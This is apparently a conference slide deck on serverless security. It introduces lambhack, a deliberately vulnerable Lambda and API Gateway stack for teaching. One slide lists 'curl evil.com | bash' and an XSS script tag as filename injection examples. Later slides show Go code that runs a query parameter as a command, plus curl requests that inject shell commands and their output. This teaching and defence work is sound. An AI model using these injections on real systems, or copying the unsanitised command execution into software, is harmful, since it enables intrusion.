SESSION ID:SESSION ID:

#RSAC

James Wickett

Serverless Security: Are You Ready for the Future?

ASD-F01

Head of ResearchSignal Sciences@wickett

#RSAC

James Wickett

2

Head of Research at Signal Sciences

Author DevOps Fundamentals at lynda.com

Author of book on DevOps (email me for a free copy > james@signalsciences.com)

Blogger at theagileadmin.com and labs.signalsciences.com

#RSAC

Conclusion

3

Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.

New serverless patterns are just emerging

Security with serverless is easier

Security with serverless is harder

#RSAC

Conclusion (2)

4

Four key areas apply to serverless security

Software Supply Chain Security

Delivery Pipeline Security

Data Flow Security

Attack Detection

New! A very vulnerable lambda stack open source project

github.com/wickett/lambhack

#RSAC

What is Serverless?

#RSAC

Misconceptions

#RSAC

It’s Marketing

(cloud rebranded)

#RSAC

Serverless ==

no servers

#RSAC

Serverless ==

Backend as a Service

#RSAC

serverless == Platform as a

Service

#RSAC

TK: AdrianCO quote

#RSAC

So, what is Serverless?

#RSAC

http://martinfowler.com/articles/serverless.html

#RSAC

@mikebroberts

#RSAC

Serverless was first used to

describe applications that

significantly or fully depend on 3rd

party applications / services (‘in

the cloud’) to manage server-side

logic and state. http://martinfowler.com/articles/serverless.html

#RSAC

Serverless can also mean applications

where some amount of server-side logic is

still written by the application developer

but unlike traditional architectures is run

in stateless compute containers that are

event-triggered, ephemeral (may only last

for one invocation), and fully managed by

a 3rd party.

http://martinfowler.com/articles/serverless.html

#RSAC

History of Serverless

17

2012 - used to describe BaaS and Continuous Integration services run by third parties

Late 2014 - AWS launched Lambda

July 2015 - AWS launched API Gateway

October 2015 - AWS re:Invent - The Serverless company using AWS Lambda

2015 to present - Frameworks forming

2016 - Serverless Conference

http://www.slideshare.net/AmazonWebServices/arc308-

the-serverless-company-using-aws-lambda

#RSAC

18

Client

Server

Database

Proxy/LB

ServerServer

Old School Arch

#RSAC

Serverless Arch

19

Client

Auth Service API Gateway

Database

Service

Function A

Function B

Web Delivery

#RSAC

20

#RSAC

What can we say is

serverless?

#RSAC

Serverless is Functions As a

Service (FaaS)

#RSAC

Containers on Demand

#RSAC

Serverless is

(no management of)

Servers

#RSAC

Serverless IS SERVICEFULL

#RSAC

Serverless is an opinionated

framework for compute

#RSAC

Serverless encourages

functions as deploy units,

coupled with third party

services that allow running

end-to-end applications

without worrying about

system operation.

#RSAC

A Short History of Cloud

28

#RSAC

Virtualization

#RSAC

“The Cloud”

#RSAC

DEVOPS

#RSAC

SaaS

PaaS

IaaS

#RSAC

Private Cloud

#RSAC

Then, along came containers

#RSAC

containers are teh hawtness

#RSAC

\

#RSAC

Lots of effort in Container

Orchestration

#RSAC

The Cloud was to

Virtualization as Serverless

will be to Containers

#RSAC

If you want to lead your company

bravely into the new world, you

would do well to focus lot on

how serverless will evolve.

- @Cloudopinionhttps://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d

#RSAC

Serverless encourages

functions as deploy units,

coupled with third party

services that allow running

end-to-end applications

without worrying about

system operation.

#RSAC

So, what are the upsides?

#RSAC

Scaling built in

#RSAC

Pay for what you use in

100MS increments

#RSAC

With Serverless system

administration is (mostly)

lower

#RSAC

Serverless is implicit

Microservices

#RSAC

Short Circuits Ops and

moves infrastructure

runtime closer to devs

#RSAC

You can skip Chefing

Dockering all the things!

#RSAC

Lean Startup Friendly

#RSAC

Increased Velocity

#RSAC

Great, what’s the catch?

#RSAC

Ops Burden to rationalize Serverless

model

(specifically Deploy)

#RSAC

Monitoring

#RSAC

Logging

#RSAC

Stateless for Real

with no persistence* across

function runs

#RSAC

Vendor Lock-In

#RSAC

Security

#RSAC

Reliability

#RSAC

#RSAC

Serverless Use cases

#RSAC

Image resizing

#RSAC

Queue processing

61

http://martinfowler.com/articles/serverless.html

#RSAC

Run a web application

#RSAC

API Gateway

63

http://martinfowler.com/articles/serverless.html

#RSAC

CI/CD

#RSAC

Security is the same and

different

#RSAC

What used to be system

calls is now distributed

computing over the network

#RSAC

Serverless shifts attack

surface to third parties

#RSAC

Lets try a sample application

in AWS

#RSAC

Go Sparta

69

Golang!

AWS Lambda supports bring your own binary

Sparta wraps your binary with node.js shim

#RSAC

#RSAC

Other options

71

Serverless Framework

APEX

Kappa

#RSAC

Wordy

72

Analyzes textual occurrences given a block of text, returns JSON count of words

Calls API under the hood to get text

It is comprised of Lambda, s3, API Gateway

#RSAC

#RSAC

#RSAC

#RSAC

go run main.go provision -s S3_BUCKET

#RSAC

#RSAC

#RSAC

#RSAC

#RSAC

#RSAC

#RSAC

#RSAC

#RSAC

#RSAC

What I learned about

serverless security

#RSAC

#RSAC

Security

#RSAC

Four areas of Serverless Security

89

Secure Software Supply Chain

Delivery Pipeline

Data Flow Security

Attack Detection

#RSAC

Secure Software Supply

Chain

#RSAC

Surface area Reduction!

#RSAC

Surface area Expansion!

#RSAC

SSL / TLS from the Provider

#RSAC

New Way

Old Way

#RSAC

Routing from the provider

#RSAC

Old Way

New Way

#RSAC

#RSAC

Lambda + s3 + kinesis + DynamoDB +

cloudformation + API Gateway + Auth0

#RSAC

Abuse of open IAM privs

99

https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds

#RSAC

Recommendation:

Use a third-party service to

monitor for provider config

changes

#RSAC

Provider Security

101

Disable root access keys

Manage users with profiles

Secure your keys in your deploy system

Secure keys in dev system

Use provider MFA

#RSAC

Delivery Pipeline Security

#RSAC

#RSAC

Unit Testing

#RSAC

Easier to mock

Harder to mock

#RSAC

#RSAC

Integration Testing

#RSAC

Configuration is part of

delivery

#RSAC

#RSAC

Simple Deploy Pipeline Security

110

Only dev keys can push to ‘dev’

Only build/deploy system can push to pre-prod

Integration tests must pass in this env

Security validation must take place

Allow push to prod, only by deploy system

#RSAC

Security Integration Testing

111

BDD-Security - github.com/continuumsecurity/bdd-security

Gauntlt - gauntlt.org

#RSAC

http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015

#RSAC

Data Flow Security

113

Development

Data Flow Diagrams

Threat modeling

Runtime

#RSAC

Your provider is responsible for the

underlying infrastructure and

services. You are responsible for

ensuring you use the services in a

secure manner.

https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a

#RSAC

Application layer DoS

#RSAC

Timeouts and Execution

restrictions

#RSAC

Attack Detection

#RSAC

https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4

#RSAC

AppSec Greatest Hits (XSS,

SQLi, Cmdexe) still relevant

15 years later!

#RSAC

AppSec Problems

120

#RSAC

Types of Attacks

121

XSS, Injection, Deserialization, …

New surface area similar problems

e.g. appending to ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3

#RSAC

Defense

122

Logging, emitting events

Vandium (SQLi) wrapper

Content Security Policy (CSP)

More things need to be done here…

#RSAC

New Thing Alert!

123

Want to see make the point that appsec is still relevant in serverless

A vulnerable Lambda + API Gateway stack (born from the heritage of WebGoat, Rails Goat and Gruyere, …)

Introducing lambhack

#RSAC

#RSAC

lambhack

125

A Vulnerable Lambda + API Gateway stack

Open Source, MIT licensed

Released for the first time here at RSA

Includes arbitrary code execution in a query string

More work needed, PRs accepted and looking for community help

github.com/wickett/lambhack

#RSAC

//command := lambdaEvent.PathParams["command"]

command := lambdaEvent.QueryParams["args"]

output := runner.Run(command)

Vulnerable code is also

vulnerable in Serverless

#RSAC

Let’s take a look at

cmdexe in lambhack

#RSAC

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args

=uname+-a;+sleep+1"

> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016

x86_64 x86_64 x86_64 GNU/Linux

uname -a

#RSAC

$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=

cat+/proc/version;+sleep+1"

> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version

4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016

cat /proc/version

#RSAC

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/

c?args=ls+-la+/tmp;+sleep+1"

total

17916

drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 .

drwxr-xr-x 21 root root 4096 Feb 8 21:47 ..

-rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64

Let’s see /tmp

#RSAC

$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/

c?args=ls+/tmp;+sleep+1"

$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/pargs=touch+/tmp/

wickettfile;+sleep+1"

$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/

args=ls+/tmp;+sleep+1"

> Sparta.lambda.amd64

wickettfile

Lambda Reuse!

#RSAC

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/

c?args=which+curl;+sleep+1"

> /usr/bin/curl

Could we upload our own

payload?

#RSAC

XSS, SQLi, … More to come!

#RSAC

email me if you are interested:

james@signalsciences.com

#RSAC

Conclusion

135

Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.

New serverless patterns are just emerging

Security with serverless is easier

Security with serverless is harder

#RSAC

Conclusion (2)

136

Four key areas apply to serverless security

Software Supply Chain Security

Delivery Pipeline Security

Data Flow Security

Attack Detection

New! A very vulnerable lambda stack open source project

github.com/wickett/lambhack

#RSAC

#RSAC

Let’s talk!

138

James Wickett

james@signalsciences.com

@wickett